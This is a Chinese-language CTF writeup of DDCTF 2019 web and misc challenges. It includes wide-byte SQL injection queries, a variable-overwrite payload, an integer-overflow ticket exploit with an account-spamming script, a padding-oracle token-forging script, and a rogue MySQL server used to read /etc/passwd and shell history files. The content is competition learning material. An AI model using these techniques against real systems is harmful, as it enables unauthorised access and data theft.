DDCTF-2019-writeup(7web+5misc)

一年前第一次参加了DDCTF,再次参加简单记录下web与misc的writeup

Web

Web1 滴~

1、jpg参数可以包含文件,参数经过两次base64和一次16进制编码,将index.php编码后,get提交

即可得到index.php源码。源码中关键有三处,1.csdn博客,2.[a-zA-Z0-9.],3.config替换为!。

2、查看博客,在该博客下另一篇博客中获取到一个关键文件名,practice.txt.swp,一般情况应为.practice.txt.swp,这里应作为特殊情况。

3、从中获取到关键文件名flag!ddctf.php。因为jpg只允许输入字母数字点,所以无法直接获取源码,这里使用config来绕过,即flagconfigddctf.php即可获取文件内容。
4、文件内容存在变量覆盖漏洞,构造payload覆盖即可

http://117.51.150.246/f1ag!ddctf.php?k=practice.txt.swp&uid=f1ag!ddctf.php

Web2 WEB 签到题

1、访问页面,F12-Network-发现一个auth.php,存在一个可伪造的ddctf_username,将其伪造为admin,获取到http://117.51.158.44/app/fL2XID2i0Cdh.php,获取到两个文件的源码

2、将源码内容全部一遍,并且分析后,得知需要构造ddctf_id通过反序列化来读取flag,需要注意的几个点,

  a) ddctf_id要验证md5,且存在盐config/key.txt

  b) Path长度为18,会将../替换为空

3、关于a,当输入一个nickname时,会输出Welcome my friend $nickname,但因使用sprintf函数,存在格式化字符串操作,所以输入%s会输出config/key.txt,注意修改content-type。之后可以使用这个key伪造ddctf_id,格式为key+ser+md5(key+ser),并且Session.php包含了appication.php所以可以直接伪造application

4、关于b,../可以使用双写绕过,不足18字符部分,使用.和/补充。这里我的payload为

 

 

Web3 Upload-IMG

上传图片,将返回的图片下载,发现经过了二次渲染。在github搜索imagecreatefromjpeg后,找到个poc

https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg

知道该版本渲染存在绕过方式,只需在ffda....3f00后更改为想要的字符将不会被二次渲染,除此之外程序永远返回jpg。所以构造即可。

 

 

但是这里来到了坑点,并不是所有图片不会改变,在windows的phpstudy和linux下,多次尝试后发现,只需将一张渲染后的图片拿来更改成功率会大大提高,所以整个流程为。上传一张jpg,下载,更改下载的这张jpg,上传,获取flag。有一定成功率,多尝试即可。

Web4 homebrew event loop

审计源码后,知道输入的请求会被多段解析,最后在eval处执行方法,并且带一个list参数args。因为使用eval来执行参数,所以只需在url中使用%23(#)后即可注释后续字符,绕过handler限制,但因为存在一个list参数,所以无法直接执行FLAG,继续审计,得知trigger_event函数为一个队列,且执行buy_handler会把consume_point_function放入队列。

buy_handler的参数可以大于3,但因consume_point_function会验证回滚,所以我们就是要解决这个问题。经过审计,发现可以构造任意方法队列,所以我们直接构造这样的payload,action:trigger_event%23;action:buy;5%23action:get_flag;,即可将flag写入session。最后使用ph师傅的flask session解密脚本,解出flag

Web5 欢迎报名DDCTF

根据提示尝试xss,发现第一行,第二行,有字符输入限制。只需将xss,payload写在第三行即可xss成功,因之前扫描发现login.php,admin.php,且提示说不是xss cookie,所以这里尝试获取源码,在admin.php中获取到一个query_aIeMu0FUoVrW0NWPHbN6z4xh.php,根据提示,输入id,没有回显。尝试或其其他页面,获取到一个hint.php,得到查询字段。依然没有进展。最后在返回数据包中发现gbk,且提示为注入,尝试宽字节注入,%df%27...%23,经过常规手工注入后获取到flag

1 ?id=1%df' union select 1,2,3,table_schema,table_name from information_schema.tables%23
2 ?id=1%df' union select 1,2,3,4,column_name from information_schema.columns%23
3 ?id=1%df' union select 1,2,ctf_value,4,5 from ctfdb.ctf_fhmHRPL5%23

 

 

 

Web6 大吉大利,今晚吃鸡~

第一关整数溢出,将票价定为2**32即可在付款时0元购票。

第二关需要新建多个小号,完成100次不同编号的击杀,只能使用脚本。这里给出脚本。

 

 1 import requests
 2 import time
 3 
 4 for i in range(0,500):
 5     s=requests.session()
 6     r=''
 7     username='wons'+str(i)
 8     while '-' not in r:
 9         url='http://117.51.147.155:5050/ctf/api/register?name={username}&password=wonswons'.format(username=username)
10         s.get(url)
11         url='http://117.51.147.155:5050/ctf/api/login?name={username}&password=wonswons'.format(username=username)
12         s.get(url)
13         url='http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296'
14         s.get(url)
15         url="http://117.51.147.155:5050/ctf/api/get_user_balance"
16         r=s.get(url).content[46:82]
17         print 1,r
18         time.sleep(0.8)
19     id=''
20     ticket=''
21     while id =='' or ticket=='':
22         url="http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id="+r
23         s.get(url)
24         url="http://117.51.147.155:5050/ctf/api/search_ticket"
25         try:
26             t=eval(s.get(url).content)
27             id=t['data'][0]['id']
28             ticket=t['data'][0]['ticket']
29         except:
30             pass
31         print 2,t
32         time.sleep(0.5)
33     v=''
34     if id==31:
35         continue
36     while '\u79fb\u9664\u4e00\u4e2a\u673a\u5668\u4eba\u73a9\u5bb6' not in v: 
37         s=requests.session()
38         url='http://117.51.147.155:5050/ctf/api/login?name=wons&password=wonswons'
39         s.get(url)
40         url='http://117.51.147.155:5050/ctf/api/remove_robot?id={id}&ticket={ticket}'.format(id=id,ticket=ticket)   
41         v=s.get(url).text
42         time.sleep(0.5)
43         print 3,v

Web7 mysql弱口令

将agent.py部署后,服务器建立mysql且为弱口令,多次tcpdump抓取数据,并且根据提示。大概明白是要完成一个类似于中间人攻击的操作,在github找到Rogue-MySql-Server,并且将agent.py返回的Rogue-MySql-Server的py进程,伪造为mysqld。达到任意文件读。尝试读取/etc/passwd,发现dc2-user,尝试读取其.bash_history,读取到后无果,尝试读取root的.bash_history,发现了关键内容vim /home/dc2-user/ctf_web_2/app/main/views.py,读取view.py后,发现flag在数据库中,经过多次尝试在/var/lib/mysql/security/flag.ibd中找到flag

 

Web8 再来1杯Java(并未解出)

Padding Oracel,这里附上脚本

 1 #coding=utf-8
 2 import requests
 3 s='UGFkT3JhY2xlOml2L2NiY8O+7uQmXKFqNVUuI9c7VBe42FqRvernmQhsxyPnvxaF'.decode('base64')
 4 
 5 #####获取后半段的middle
 6 '''
 7 middle=[]
 8 for i in range(1,17):
 9     iv=''
10     for j in middle[::-1]:
11         iv+=chr(i^j)
12     for j in range(256):
13         token=s[:16]+'\x00'*(16-i)+chr(j)+iv+s[32:]
14         token=token.encode('base64')[:-1]
15         cookies= {'token': token}
16         r=requests.get('http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/gen_token',cookies=cookies).text
17         if 'parse' in r:
18             middle.append(j^i)
19             print token
20             break
21     print middle
22 '''
23 ####伪造后半段的iv
24 '''
25 middle=[19, 80, 63, 211, 94, 75, 38, 89, 11, 199, 102, 4, 138, 135, 211, 167][::-1]
26 text='dmin":true}\x05\x05\x05\x05\x05'
27 new_iv=''
28 for i in range(len(text)):
29     new_iv+=chr(ord(text[i])^middle[i])
30 token=s[:16]+new_iv+s[32:]
31 token=token.encode('base64')[:-1]
32 print token
33 '''
34 ###UGFkT3JhY2xlOml2L2NiY8O+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF
35 s='UGFkT3JhY2xlOml2L2NiY8O+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF'.decode('base64')
36 
37 #####获取前半段的middle
38 '''
39 middle=[]
40 for i in range(1,17):
41     iv=''
42     for j in middle[::-1]:
43         iv+=chr(i^j)
44     for j in range(256):
45         token='\x00'*(16-i)+chr(j)+iv+s[16:32]
46         token=token.encode('base64')[:-1]
47         cookies= {'token': token}
48         r=requests.get('http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/gen_token',cookies=cookies).text
49         if 'parse' in r:
50             middle.append(j^i)
51             print token
52             break
53     print middle'''
54 
55 middle=[155, 97, 132, 252, 102, 28, 20, 19, 14, 193, 24, 113, 210, 113, 223, 16][::-1]
56 ####伪造前半段的iv
57 text='{"id":100,"roleA'
58 new_iv=''
59 for i in range(len(text)):
60     new_iv+=chr(ord(text[i])^middle[i])
61 token=new_iv+s[16:]
62 token=token.encode('base64')[:-1]
63 print token
64 #a/0YtlMi8D4jOD4Uk+gE2sO+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF

后续存在任意文件读,没有思路

Misc

Misc1 真签到题

公告栏里获取

Misc2 北京地铁

Lsb隐写得到aes密文,地图上魏公村颜色不一样,拼音即为密钥

 

1 from Crypto.Cipher import AES
2 
3 key='weigongcun'
4 cryptor = AES.new(key+(16-len(key))*'\x00', AES.MODE_ECB)
5 text = cryptor.decrypt('iKk/Ju3vu4wOnssdIaUSrg=='.decode('base64'))
6 print text #DDCTF{CD*Q23&0}

Misc3 MulTzor

直接看密文发现每6个16进制可以分为一组,开头都为0-9,猜测是使用3位长的密钥进行加密,最终发现不对。最后使用xortool -c 20 file分析,获取了明文。

Misc5 Wireshark

从两个上传表单中获取到两张图,其中一张通过改高度获取key,然后将另一张放入数据包中出现的地址进行隐写解密,获取flag的十六进制

http://tools.jb51.net/aideddesign/img_add_info

Misc6 联盟决策大会

 1 p = 0xC53094FE8C771AFC900555448D31B56CBE83CBBAE28B45971B5D504D859DBC9E00DF6B935178281B64AF7D4E32D331535F08FC6338748C8447E72763A07F8AF7
 2 A1 = 0x30A152322E40EEE5933DE433C93827096D9EBF6F4FDADD48A18A8A8EB77B6680FE08B4176D8DCF0B6BF50000B74A8B8D572B253E63473A0916B69878A779946A
 3 A2 = 0x1B309C79979CBECC08BD8AE40942AFFD17BBAFCAD3EEBA6B4DD652B5606A5B8B35B2C7959FDE49BA38F7BF3C3AC8CB4BAA6CB5C4EDACB7A9BBCCE774745A2EC7
 4 A4 = 0x1E2B6A6AFA758F331F2684BB75CC898FF501C4FCDD91467138C2F55F47EB4ED347334FAD3D80DB725ABF6546BD09720D5D5F3E7BC1A401C8BD7300C253927BBC
 5 B3 = 0x300991151BB6A52AEF598F944B4D43E02A45056FA39A71060C69697660B14E69265E35461D9D0BE4D8DC29E77853FB2391361BEB54A97F8D7A9D8C66AEFDF3DA
 6 B4 = 0x1AAC52987C69C8A565BF9E426E759EE3455D4773B01C7164952442F13F92621F3EE2F8FE675593AE2FD6022957B0C0584199F02790AAC61D7132F7DB6A8F77B9
 7 B5 = 0x9288657962CCD9647AA6B5C05937EE256108DFCD580EFA310D4348242564C9C90FBD1003FF12F6491B2E67CA8F3CC3BC157E5853E29537E8B9A55C0CF927FE45
 8 c1=(A1*8-A2*6+A4)/3
 9 c2=B3*10-B4*15+B5*6
10 print hex(c1*2-(c2%p))[2:-1].decode('hex') #DDCTF{5x3ROxvqF2SJrDdVy73IADA04PxdLLab}

 

posted @ 2019-04-19 15:58  ~kagi~  阅读(1921)  评论(0编辑  收藏  举报